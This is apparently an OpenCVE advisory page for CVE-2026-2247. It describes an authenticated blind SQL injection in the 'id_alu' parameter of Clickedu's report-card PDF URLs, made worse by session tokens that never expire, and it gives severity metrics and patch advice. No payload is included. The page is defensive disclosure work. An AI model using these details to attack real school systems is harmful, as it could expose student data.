Description
SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application.

In the URL of the generated PDF, the session token used does not expire, so it remains valid for days after its generation, and unusual characters can be entered after the ‘id_alu’ parameter, resulting in two types of SQLi: boolean-based blind and time-based blind. Exploiting this vulnerability could allow an attacker to access confidential information in the database.
Published: 2026-02-17
Score: 8.3 High
EPSS: < 1% Very Low
KEV: No
Impact: Database Compromise
Action: Immediate Patch
AI Analysis

Impact

SQL Injection vulnerability exists in Clickedu SaaS platform during report generation. An authenticated remote attacker can exploit the non-expiring session token and append malicious characters to the 'id_alu' parameter in the PDF generation URL, leading to boolean-based or time-based blind SQL injection. The exploit enables reading confidential database information without needing higher privileges.

Affected Systems

Clickedu SaaS platform; all current versions are affected until the integration update released on 26/01.

Risk and Exploitability

The vulnerability has a CVSS score of 8.3, indicating high severity, but the EPSS score is less than 1%, suggesting a low probability of exploitation. It is not listed in the CISA KEV catalog. The attack requires an authenticated remote user and relies on missing input validation and a long-lived session token.

Generated by OpenCVE AI on April 17, 2026 at 18:57 UTC.

Remediation

Vendor Solution

The vulnerability has been fixed by the Clickedu team in the integration of 26/01.

OpenCVE Recommended Actions

  • Apply the integration update released on 26/01 to patch the SQL injection vulnerability.
  • Enforce session token expiration or restrict long-lived session tokens used in report URLs to prevent reuse.
  • Validate and sanitize the 'id_alu' input parameter to accept only valid account identifiers and reject special characters, mitigating SQL injection.

Generated by OpenCVE AI on April 17, 2026 at 18:57 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 17 Feb 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 17 Feb 2026 12:00:00 +0000

Type Values Removed Values Added
Description SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generation of reports, which occurs when a previously authenticated remote attacker executes a malicious payload in the URL generated after downloading the student's report card in the ‘Day-to-day’ section from the mobile application. In the URL of the generated PDF, the session token used does not expire, so it remains valid for days after its generation, and unusual characters can be entered after the ‘id_alu’ parameter, resulting in two types of SQLi: boolean-based blind and time-based blind. Exploiting this vulnerability could allow an attacker to access confidential information in the database.
Title SQL Injection in Clickedu's SaaS platform
First Time appeared Clickedu
Clickedu saas Platform
Weaknesses CWE-89
CPEs cpe:2.3:a:clickedu:saas_platform:all_versions:*:*:*:*:*:*:*
Vendors & Products Clickedu
Clickedu saas Platform
References
Metrics cvssV4_0

{'score': 8.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N'}

Subscriptions

Clickedu Saas Platform
cve-icon MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-02-17T14:27:12.189Z

Reserved: 2026-02-09T13:32:29.854Z

Link: CVE-2026-2247

cve-icon Vulnrichment

Updated: 2026-02-17T14:27:03.648Z

cve-icon NVD

Status : Deferred

Published: 2026-02-17T12:16:15.443

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-2247

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-17T19:00:11Z

Weaknesses